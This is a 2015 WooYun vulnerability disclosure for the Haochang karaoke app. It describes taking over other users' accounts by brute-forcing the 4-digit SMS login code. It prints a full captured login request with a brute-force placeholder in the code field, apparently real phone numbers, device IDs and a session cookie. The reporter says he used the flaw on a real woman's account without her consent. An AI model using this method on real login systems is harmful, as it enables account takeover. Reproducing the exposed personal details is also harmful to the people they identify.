当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137080

漏洞标题:好唱APP 可以登录他人帐号

相关厂商:okchang.com

漏洞作者: 柱子

提交时间:2015-08-26 14:25

修复时间:2015-10-10 14:40

公开时间:2015-10-10 14:40

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

调戏了好唱群中的妹子~

详细说明:

手机APP抓包
登录选择手机登录
手机号填写妹子手机号

1111.png


获取验证码

POST /login_tel/ HTTP/1.1
Host: api.51kalaok.com
tel-mac: 02:00:00:00:00:00
tel-system: IOS
Pragma: no-cache
Connection: keep-alive
tel-idfa: 86A2E77F-0F3E-42F0-A0CA-6C3907197782
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
app-version: 3.1
tel-resolution: 640*960
tel-WIFI: 1
Accept-Language: zh-Hans;q=1, en;q=0.9, fr;q=0.8, de;q=0.7, zh-Hant;q=0.6, ja;q=0.5
User-Agent: haochang/3.1.8 (iPhone; iOS 7.1.2; Scale/2.00)
Accept: */*
tel-model: iPhone4,1
tel-IMEI: BCE62028-3163-4617-8C28-0FDC0B6B2C89
app-channel: itunes
tel-version: 7.1.2
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 194
Cookie: PHPSESSID=l4kn402b27s7gtpet9o32aneo7; SERVER_ID=d79cb948-e301abb1
tel=18725649518&password=&CAPTCHA=§1000§&userId=0&sign=9bee22e6d2fbcf131d9d9d181c977271&client_time=1440558889.28604&ios_push_token=25eb6dfac891f04993802545d6fdc22d3bbcdd8a760e1f03cd79c81c90fd4d81


然后开始爆破captcha参数
4位验证码 一会就跑出来了
然后登陆账号

漏洞证明:

E1190A4A717328DEA47C2FE8C894FB1B.png


然后测试了一个18888888888的帐号

QQ图片20150826134801.jpg

修复方案:

https进行认证 然后对IP进行限制

版权声明:转载请注明来源 柱子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-26 14:39

厂商回复:

感谢您的提交,已通知相关处理

最新状态:

暂无